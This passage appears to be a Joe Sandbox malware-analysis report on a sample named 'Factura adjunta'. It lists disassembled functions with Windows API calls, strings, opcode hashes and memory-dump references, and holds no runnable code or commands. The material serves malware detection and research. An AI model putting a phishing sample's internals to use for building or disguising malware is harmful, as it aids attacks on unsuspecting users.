                            Function 007D023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$+
                            • API String ID: 0-2552117581
                            • Opcode ID: 145032f6e8083da295f9f7fedb3fb81bad81272234f70baf23e925ee9fc028ed
                            • Instruction ID: 78902334dcd09df9b3c8c77a16a20e8eb0cb94ecc22a4fa7d84521fa2d1a3f92
                            • Opcode Fuzzy Hash: 145032f6e8083da295f9f7fedb3fb81bad81272234f70baf23e925ee9fc028ed
                            • Instruction Fuzzy Hash: 7C51ED7550564ADFDF259F28C8886FA7BB4FF56310F14406AEC919B2E0D6389D82CBB0
                            Function 007C3297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove$_free
                            • String ID: Oa|
                            • API String ID: 2620147621-2714924062
                            • Opcode ID: f08318e87b732df123c653b5a3169dacd9de1344076daa109e045fabf924ccc3
                            • Instruction ID: d369054112dba57d211fef5896a50d7bc5768c8b433e41c18778c1b66df24b47
                            • Opcode Fuzzy Hash: f08318e87b732df123c653b5a3169dacd9de1344076daa109e045fabf924ccc3
                            • Instruction Fuzzy Hash: 44514A716083419FDB24CF28D491B2ABBF5BF89314F04892DE98997351EB39D901CB92
                            Function 0080DA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0080DAFB
                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0080DB0C
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0080DB8E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorMode$AddressProc
                            • String ID: DllGetClassObject
                            • API String ID: 1548245697-1075368562
                            • Opcode ID: 54ac71c900e8a3fcea851d2b819cdace14cfb5a2e7c466cec728aa6e2fa11533
                            • Instruction ID: 4cc63967b68ea977f310181286cd5c9edf8218986368e68dc55a11e6a18b3287
                            • Opcode Fuzzy Hash: 54ac71c900e8a3fcea851d2b819cdace14cfb5a2e7c466cec728aa6e2fa11533
                            • Instruction Fuzzy Hash: 01418EB1600308EFDB55CF94CC84A9ABBA9FF44320F1680A9ED05DF286D7B1D944CBA0
                            Function 00837BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0083F910,00000000,?,?,?,?), ref: 00837C4E
                            • GetWindowLongW.USER32 ref: 00837C6B
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00837C7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: c6dba11d70799e18c6720f4cd98ba93151debc9ac4743e12fca48a0ab21d1608
                            • Instruction ID: 45a7893c1d1865565860a3bd7f3dee5e36908d244ec04028f4d29ad8ba17c4cd
                            • Opcode Fuzzy Hash: c6dba11d70799e18c6720f4cd98ba93151debc9ac4743e12fca48a0ab21d1608
                            • Instruction Fuzzy Hash: D531FE71604206ABDB218F38CC05BEA77A9FB85334F204725F979D32E1D734E8529B90
                            Function 00837648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008376D0
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008376E4
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00837708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: 5f9c1426dea71df73080dabc2e99c883828c2bcb38df447fe48341347e5f3448
                            • Instruction ID: 7b7217d32551a3f088721ea0b4a8395d46a9df76ee1aa5837fc22bbdc80a711e
                            • Opcode Fuzzy Hash: 5f9c1426dea71df73080dabc2e99c883828c2bcb38df447fe48341347e5f3448
                            • Instruction Fuzzy Hash: E721BF72600219ABDF218F64CC46FEA3B69FF98754F110214FE15AB1D1E6B1E890CBE0
                            Function 00836F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00836FAA
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00836FBA
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00836FDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: cab1f9433e7401139a149ab2ad2b9a6989c1c07fe2117ef25cf414c7e994126d
                            • Instruction ID: 76dd7e0f09373681baf3ba1164e37cbfc1843d3ca6ab3be8b52c05a10a502dfe
                            • Opcode Fuzzy Hash: cab1f9433e7401139a149ab2ad2b9a6989c1c07fe2117ef25cf414c7e994126d
                            • Instruction Fuzzy Hash: 08215032610118BFDF159F58DC85EAB3BAAFFC9754F118124FA14DB190DA71AC618BE0
                            Function 0083797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008379E1
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008379F6
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00837A03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: 756e6e4856f0c9759ebb9c8624c6f09a14d5da2a353877d194e60ca5f357b4f0
                            • Instruction ID: 4537938aca33e11ccb0d12f64f382e9a314f2eab7ed8d8b1b93fc277a1821644
                            • Opcode Fuzzy Hash: 756e6e4856f0c9759ebb9c8624c6f09a14d5da2a353877d194e60ca5f357b4f0
                            • Instruction Fuzzy Hash: 6F11E772244208BBEF249F64CC05FEB3BA9FFC9764F010629FA45E6091D271D851DBA0
                            Function 0083AF89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(?,008767B0,0083DB17,000000FC,?,00000000,00000000,?,?,?,007EBBB9,?,?,?,?,?), ref: 0083AF8B
                            • GetFocus.USER32 ref: 0083AF93
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • SendMessageW.USER32(00E9EBB8,000000B0,000001BC,000001C0), ref: 0083B005
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Long$FocusForegroundMessageSend
                            • String ID: h)
                            • API String ID: 3601265619-3328819710
                            • Opcode ID: dbf532ce62b1bd9811241073ae18d336396a7de1d99e73994bb52717cf9e36ae
                            • Instruction ID: b597581263191da53789cf2758c676645784d97b9cf608628e44991a9029cc2f
                            • Opcode Fuzzy Hash: dbf532ce62b1bd9811241073ae18d336396a7de1d99e73994bb52717cf9e36ae
                            • Instruction Fuzzy Hash: 590196716019008FC7289B28D898A6737E5FFC9324F180679E526C72A1DB31AC56CB90
                            Function 0082C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,007F1D88,?), ref: 0082C312
                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082C324
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                            • API String ID: 2574300362-1816364905
                            • Opcode ID: ee6227989e39650be7066607d56656841d8d275618d6cd19478a02214be28b09
                            • Instruction ID: ef566aaed6bb9e2269321aa97ae5960635f1edc4f3ee41dc749d5d5f5f07801a
                            • Opcode Fuzzy Hash: ee6227989e39650be7066607d56656841d8d275618d6cd19478a02214be28b09
                            • Instruction Fuzzy Hash: F4E08670600713CFCB208B25E808A5A76D4FB48314F408C3AE595C2310D774D880C6D0
                            Function 007B4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4C2E), ref: 007B4CA3
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007B4CB5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: 51f5556c521262fc8fc54fb7f0d956267b2fc6fdb1df638ad3604dd3cd0a18c2
                            • Instruction ID: 3fcc0e497c10dda263925518418c21144012a91f068e27c68609f8b549612859
                            • Opcode Fuzzy Hash: 51f5556c521262fc8fc54fb7f0d956267b2fc6fdb1df638ad3604dd3cd0a18c2
                            • Instruction Fuzzy Hash: F6D0C270900327DFC7204F30D908646B6D4BF41B50F108C39E991D2261D778C480C6E0
                            Function 007B4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4D2E,?,007B4F4F,?,008762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4D6F
                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B4D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-3689287502
                            • Opcode ID: c6746a6aac200a4a482f98d4b74ca3f469d866022f22e740640e779a40432e01
                            • Instruction ID: 77adb2905545abadc86891003bc6453939d3a1e4ab3589003718f8be3c794f69
                            • Opcode Fuzzy Hash: c6746a6aac200a4a482f98d4b74ca3f469d866022f22e740640e779a40432e01
                            • Instruction Fuzzy Hash: 3FD01270A10713CFD7215F31D80875676D8BF55351F118D399596D6251D678D480CAD0
                            Function 007B4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4CE1,?), ref: 007B4DA2
                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4DB4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-1355242751
                            • Opcode ID: 0feb702e5eb0d7c26d34049498f25654a92c7eaa26a8d4e8ced7b5a87de81b56
                            • Instruction ID: ace802ee59885f96047975c0ebbd035359285f23fb7b072817a59c59a7ac2e36
                            • Opcode Fuzzy Hash: 0feb702e5eb0d7c26d34049498f25654a92c7eaa26a8d4e8ced7b5a87de81b56
                            • Instruction Fuzzy Hash: F9D01271A50713DFD7205F31D809B8A76D4FF45355B118C39E9D5D6251D778D480C6D0
                            Function 00831072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll,?,008312C1), ref: 00831080
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00831092
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: f3a1bf31edf8ac12cce6864e888cd2bac56c86db45364a62e8317b6965675138
                            • Instruction ID: ebe730690f5bcf4b680279367ba2e19adc604ff088e21d821c456fa6b4731910
                            • Opcode Fuzzy Hash: f3a1bf31edf8ac12cce6864e888cd2bac56c86db45364a62e8317b6965675138
                            • Instruction Fuzzy Hash: A1D01230910712CFDB205F75D82951B76E4FF45755F118C39A495D6260D774C4C0C690
                            Function 008293F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00829009,?,0083F910), ref: 00829403
                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00829415
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetModuleHandleExW$kernel32.dll
                            • API String ID: 2574300362-199464113
                            • Opcode ID: 8e22bb7fffb27807d6e86d9f655c26476c365cfd628e8c8767846598ebb1f0b5
                            • Instruction ID: 75d8d0d38d6b97af30f12a25590e03227c090abde33363cebbac6ab3c537ff0c
                            • Opcode Fuzzy Hash: 8e22bb7fffb27807d6e86d9f655c26476c365cfd628e8c8767846598ebb1f0b5
                            • Instruction Fuzzy Hash: E8D0E274910722CFDB21AB31E908A0AB6E5FF55351F11CC3AE596D6661E6B4C8808A90
                            Function 007F1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: c97aeaada6c73ccf0ad4f1332012b06f268483aeae03d148a55b082f88684b10
                            • Instruction ID: 4f89046708bbe62f190c7917c0bc739212727965cc3440b9eed79594f83bd57a
                            • Opcode Fuzzy Hash: c97aeaada6c73ccf0ad4f1332012b06f268483aeae03d148a55b082f88684b10
                            • Instruction Fuzzy Hash: BBD012F1C0411CEACB05DA909C449FA737CB704301F9405D2BA06E1200F27C9B84AB25
                            Function 008076C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
